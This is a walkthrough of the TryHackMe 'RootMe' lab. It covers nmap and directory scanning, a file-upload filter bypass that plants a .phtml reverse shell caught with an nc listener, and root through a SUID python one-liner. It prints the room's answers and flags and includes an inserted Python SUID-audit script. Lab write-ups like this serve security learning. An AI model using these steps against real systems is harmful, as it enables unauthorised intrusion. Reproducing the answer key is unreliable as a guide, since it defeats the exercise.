THM_RootMe_Walkthrough
Simple Walkthrough for a TryHackMe Room
RootMe TryHackMe
performed by: jb-williams
Deploy the machine
Reconnaissance
- To get info on the target, run this `nmap` command:

```
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.105.101
```
- This provides the answers to the following three questions.

Scan the machine, how many ports are open?
- Answer: `2`

What version of Apache is running?
- Answer: `2.4.29`

What service is running on port 22?
- Answer: `ssh`
Find directories on the web server using the GoBuster tool.
- To find directories you can use `gobuster`, but I prefer `feroxbuster`.
- Here are the respective commands I would run:

```
gobuster dir -u http://10.10.105.101 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobust.txt -t 15
```

- Since this (below) is my normal command, I also have it set to go through my web proxy so I can capture the requests/responses.

```
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.105.101/
```

What is the hidden directory?
- Answer: `/panel/`
Getting a Shell
Find a form to upload and get a reverse shell, and find the flag.
- With the `feroxbuster` scan I found both `/panel/` and `/uploads/`.
- Traversing to `http://<IP>/panel/`, there seems to be a file upload page.
- Tried uploading a reverse shell `.php` file from pentestmonkey. It would not allow that extension, so I attempted several other PHP file extensions.
- After a few, I landed on being able to upload a `.phtml` file.
- Then going to the previously mentioned `http://<IP>/uploads/`, you can see the previously uploaded files as a directory listing.

user.txt
- Set up a listener on the port you had provided in the reverse shell with `nc`:

```
nc -lvnp 4444
```

- Then clicking on your `.phtml` reverse shell file in the `/uploads/` listing will give you a reverse shell on that server.
- They give us a prompt for the `user.txt`; if there is a file available:

```
cat $(find / -type f -iname user.txt 2> /dev/null)
```

- If you `cat` that file you get the user flag.
- Answer: `THM{y0u_g0t_a_sh3ll}`
Privilege Escalation
Search for files with SUID permission, which file is weird?
- To find all `SUID` files, you can use this command:

```
find / -perm -4000 2>/dev/null
```

- Looking through the output, sort of using my local machine as a reference, this binary looks out of place.
- Answer: `/usr/bin/python`
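As an added example (not part of the original walkthrough), here is a small Python audit script that does the same job as the `find / -perm -4000` step and then flags the entries a defender would want to look at: anything outside a baseline of expected SUID binaries, anything that is an interpreter or shell (the `/usr/bin/python` finding above), and anything world-writable. The baseline set and interpreter list are my own assumptions, an illustrative subset rather than an authoritative list.

```python
import os
import stat

# Assumed baseline of SUID binaries a stock Debian/Ubuntu-style host ships with.
# Illustrative subset only; build the real baseline from a known-good image.
KNOWN_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
}

# Interpreters and shells that should never carry the SUID bit: a setuid
# interpreter lets any local user spawn a root shell, as this room shows.
INTERPRETER_NAMES = {"python", "perl", "ruby", "bash", "sh", "dash", "zsh"}


def collect_suid(root="/"):
    """Walk the filesystem and return (path, mode) for every regular file with
    the SUID bit set. Uses os.lstat so symlinks are reported, not followed."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_mode))
    return found


def classify_suid(entries, baseline=KNOWN_SUID):
    """Split (path, mode) entries into (expected, suspicious). An entry is
    suspicious when it is not in the baseline, when its basename (minus a
    version suffix such as python3.6) is an interpreter, or when it is
    world-writable, which would let anyone replace a setuid binary."""
    expected, suspicious = [], []
    for path, mode in entries:
        stem = os.path.basename(path).rstrip("0123456789.")
        if (path not in baseline or stem in INTERPRETER_NAMES
                or mode & stat.S_IWOTH):
            suspicious.append(path)
        else:
            expected.append(path)
    return expected, suspicious


if __name__ == "__main__":
    _expected, suspicious = classify_suid(collect_suid("/"))
    for p in suspicious:
        print("SUSPICIOUS SUID:", p)
```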
Find a form to escalate your privileges.
- Knowing that we have access to the `SUID` `/usr/bin/python`, the first thing I tend to do is check GTFOBins, to see if there are any options there.
- After attempting the one listed, I actually couldn't get it to work properly, so after looking at previous notes and trying different ways, I found these two commands each work depending on your shell preference.

```
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
```

or

```
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
```
root.txt
- After using that python command, `root` access was given; again they prompted us with `root.txt`, and assuming it was in the `/root` directory I just used `cat` on the absolute path.
- You could also use this command if the file was not in the `/root` directory.

```
cat $(find / -type f -iname root.txt 2> /dev/null)
```

- Answer: `THM{pr1v1l3g3_3sc4l4t10n}`
2023-04-15 10:41